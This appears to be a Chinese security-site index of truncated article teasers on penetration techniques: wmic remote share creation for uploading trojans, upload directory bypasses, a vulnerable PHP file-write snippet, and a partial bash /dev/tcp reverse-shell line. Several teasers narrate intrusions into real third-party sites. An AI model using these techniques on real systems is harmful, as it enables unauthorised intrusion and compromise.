渗透测试
权限丢失之时,getshell之日
前言:当初手头有个站,jsp的,root权限运行,轻而易举拿到了root,然后做了bugscan的节点..就这么过了几个月吧。某一天发现bugscan节点掉了,只依稀记得IP地址,但是忘了怎么撸下来的。为了避免自己当节点的麻烦,决定再撸一次。以下图片打码尽量严谨,若有露点之处,还请指出。0x01终于理解为什么都
友情检测本地某网络公司站
By kris Kris # sty1e.org-----------这次主域名直接URL跳转到淘宝了,主站开始也是卖杯子,淘宝也是。那不管。继续搜索下有其他域名没。接下来就开始检测。。。网站采用的是网购程序ecshop 。。。直接旁注。查同服网站。最后的网站矮个看了下基本没什么漏洞。为了节省时间,找好入手的cms。。。。www.
英雄救美之完爆伪基站作者
看到朋友圈一个妹子手机收到了短信,我一看晚上无聊没事做就去看看吧。打开网站之后才发现这个貌似在哪看到过,界面貌似有点熟悉,在T00ls里看到过,我就试试越权发现也是存在的,后台数据也是挺多的。貌似还都是最新的数据,还有好多条。当我在登陆框输入了一个‘符号之后发现报错了,那就是应该存在P
wmic 远程建立可写入共享,一种思路及实践
内网渗透时候,上传木马经常没有默认共享,不可写入的共享文件夹后面初步接触wmic,认识了wmic远程强大的功能,于是想到了远程主机给主机建立可写入的共享,然后上传木马上去执行目标主机win2008使用share别名wmic share call create /? 查看一下参数命令如下:wmic /node:ip /user:user /password:pa
Web防御之生产环境如何为tomcat配置chroot jail环境
目的: 让tomcat 以一个低用户的权限运行,并且将tomcat 放在类似于监牢里的目录里。即使有黑客入侵系统,将对系统的影响放到最低。在发现系统被入侵后,运维可以在1~2分钟内恢复应用。恢复操作使用脚本重建chroot环境即可实施要求:1 要求tomcat 在非chroot环境下是正常运行的2 确保JAVA_HOME
SQL注入执行绕过目录执行脚本限制
前言:这个站我以前已经拿过一次了,后来掉了,以前是找了个地方上传,但是有目录限制,后来用以前发的那个../跳目录跳走了,但是又提示进程占用什么的,然后过了一会儿马竟然变成0KB了,估计有什么东西在作怪,然后跑去贴吧发帖,有个人给我了一个aspx大马,传上去就分分钟秒杀了,提上去有360全套,
渗透DNF黑信站点
昨天晚上一个同学问我,怎么去做一个钓鱼网站。我们聊着聊着就到了DNF黑信这块,我以前写DNF外挂的时候了解过这个黑信。我百度了一下,发现几个黑箱子的网站。不啰嗦了,嘻嘻,开始猥琐吧!站点:http://www.yxheixin.com/(对于这种网站损害玩家利益的网站公开)一:无意的发现我随便就点开了几个页面
奇葩招式跨目录上传
前边的一些步骤就不讲了,这里直接讲怎么奇葩招式跨目录上传的。抓包改包后,成功上传。可是访问出现403,该目录没有执行权限,这里就得跨目录上传,看不看上级目录有没有执行权限。那么奇葩招式来了。在../cs.asp增加一个斜杠,上传后出现500不要管它。接着去掉刚刚加入的斜杠,再点上传,结果如图打
PHP file_put_content函数写文件鸡肋绕过
昨天遇到个站,非常奇葩,把客户的评论写到文件里面,而且开了报错。所以就很容易地看出了那个文件的源码,大概是这样的:<?php $name1 = $_POST; $name2 = $_POST; $val = $_POST; file_put_contents('./company_list/'.$name2.'-'.$name1.'.txt', $val); ?>所以,我就想,能不能把那个.txt截断,然后
Web渗透中的反弹Shell与端口转发的奇淫技巧
转自:https://www.91ri.org/9367.html0x00 前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01 反弹shell1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x
